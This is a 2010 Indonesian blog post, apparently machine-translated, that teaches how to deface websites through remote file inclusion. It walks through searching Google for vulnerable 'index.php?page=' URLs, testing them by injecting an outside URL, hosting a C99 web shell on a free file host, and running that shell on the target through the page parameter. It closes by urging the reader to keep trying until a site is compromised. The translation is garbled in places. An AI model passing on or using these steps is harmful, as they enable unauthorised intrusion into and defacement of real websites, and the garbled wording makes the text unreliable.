Minggu, 26 Desember 2010

Cara hack website menggunakan file inlcusion Remote

Saya menerima banyak e-mail pada Cara Hack situs begitu,
hari ini saya akan menunjukkan bagaimana hacker menggunakan inlcusion remote file untuk men-deface website.

Persyaratan
C99 shell


Pertama-tama google kunjungan dan jenis

"Index.php page =?"

Ini akan menampilkan semua halaman yang telah index.php? Page = "di url mereka, kerentanan RFI hanya bekerja pada situs-situs yang telah index.php page = di url mereka?.


Sekarang mari kita mengatakan bahwa situs web adalah sebagai berikut:


www.targetsite.com/index.php?page=something


sehingga untuk memeriksa kerentanan kami akan mengganti sesuatu untuk
Google atau situs lainnya sekarang jika situs Google menampilkan Facebook ini berarti bahwa website ini rentan terhadap url attack.The akan terlihat seperti



www.targetsite.com/index.php?page=www.google.com



Setelah kita mengetahui bahwa website ini rentan terhadap serangan kita sekarang akan mencakup shell.To C99 melakukannya download shell C99 dan kemudian meng-upload ke situs webhosting sepertiSelamat Datang Ripway.com - free file hosting, musik gratis hosting, menghubungkan langsung atauKebanyakan Didukung GRATIS Website Hosting Provider | Free Web Hosting


Setelah shell diupload Anda akan memiliki url unik untuk shell anda katakanlah itu


www.webhostingsite.com/c99.txt


Sekarang untuk mengeksekusi shell untuk mendapatkan akses ke website kami akan lakukan sebagai berikut


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett itu "?" atau yang lain itu wont akan dieksekusi.


Ingat ini tidak bekerja pada semua situs web sehingga kuncinya adalah untuk mencoba dan mencoba dan mencoba dan mencoba!

0 komentar:

Posting Komentar

Twitter Delicious Facebook Digg Stumbleupon Favorites More
 
Free Web Hosting